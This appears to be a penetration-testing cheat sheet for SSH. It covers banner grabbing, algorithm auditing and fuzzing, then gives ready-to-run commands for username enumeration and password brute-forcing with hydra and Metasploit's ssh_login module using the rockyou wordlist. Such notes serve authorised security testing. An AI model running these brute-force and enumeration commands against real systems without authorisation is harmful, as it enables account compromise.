The SSH protocol (Secure Shell) is used to login from one machine to another securely. It offers several options for strong authentication, as it protects the connections and communications security and integrity with strong encryption. This connection can be used for terminal access, file transfers, and for tunneling other applications.
It is possible to enumerate the allowed authentication types with the following command:
ssh -v <IP>OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019...debug1: Authentications that can continue: publickey,password,keyboard-interactive
Useful to get basic information about the SSH server such as its type and version.
nc -vn <IP> 22...SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7
ssh-keyscan -t rsa <IP> -p <PORT>
Some auditing tools can help to quikly find the target version and which algorithms are available on the server in order to give recommendations to the customer.
nmap -p22 -n -sV --script ssh2-enum-algos <IP>
ssh-audit -p 22 -4 <IP>
Fuzzing the SSH service could help to find vulnerabilities. The automated fuzzing is simple but not very targeted so it usually takes a lot of time and could miss some results. The custom and the manual approach is more effective but it takes time to familiarize yourself with the target. Here is an example of a custom fuzzing : Fuzzing the OpenSSH daemon using AFL.
msfconsoleuse auxiliary/fuzzers/ssh/ssh_version_2set RHOSTS <IP>run
msfconsoleuse scanner/ssh/ssh_enumusersset RHOSTS <IP>set USER_FILE <user_file_path>
hydra -l <user> -s 22 -P <path_pass_list> <IP> -t 4 ssh
msfconsoleuse auxiliary/scanner/ssh/ssh_loginset PASS_FILE /usr/share/wordlists/password/rockyou.txtset RHOSTS <IP>set STOP_ON_SUCCESS trueset username <USER>run